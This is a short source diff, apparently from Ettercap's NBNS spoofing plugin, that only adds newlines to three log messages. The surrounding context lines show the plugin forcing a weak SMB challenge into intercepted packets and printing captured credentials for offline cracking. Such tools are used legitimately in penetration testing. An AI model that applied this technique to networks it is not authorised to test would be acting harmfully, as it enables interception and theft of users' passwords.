@@ -232,7 +232,7 @@ static int load_db(void)
 	f = open_data("etc", ETTER_NBNS, FOPEN_READ_TEXT);
 
 	if (f == NULL) {
-		USER_MSG("Cannot open %s", ETTER_NBNS); return -EINVALID;
+		USER_MSG("Cannot open %s\n", ETTER_NBNS); return -EINVALID;
 	}
 	
 	while (fgets(line, 128, f)) {
@@ -324,7 +324,7 @@ static void nbns_set_challenge(struct packet_object *po)
 				//memcpy new challenge (8 bytes) to ptr
 				memset(ptr, (long)SMB_WEAK_CHALLENGE, 8);
 				po->flags |= PO_MODIFIED; /* calculate checksum */
-				USER_MSG("nbns_spoof: Modified SMB challenge");
+				USER_MSG("nbns_spoof: Modified SMB challenge\n");
 			}
 		}
 	}
@@ -344,7 +344,7 @@ static void nbns_print_jripper(struct packet_object *po)
 	/*
          * Thanks to the SMB dissector, po->DISSECTOR.pass contains everything we need but domain
          */
-	USER_MSG("%s%s", po->DISSECTOR.info, po->DISSECTOR.pass);
+	USER_MSG("%s%s\n", po->DISSECTOR.info, po->DISSECTOR.pass);
 }
 
 /* 
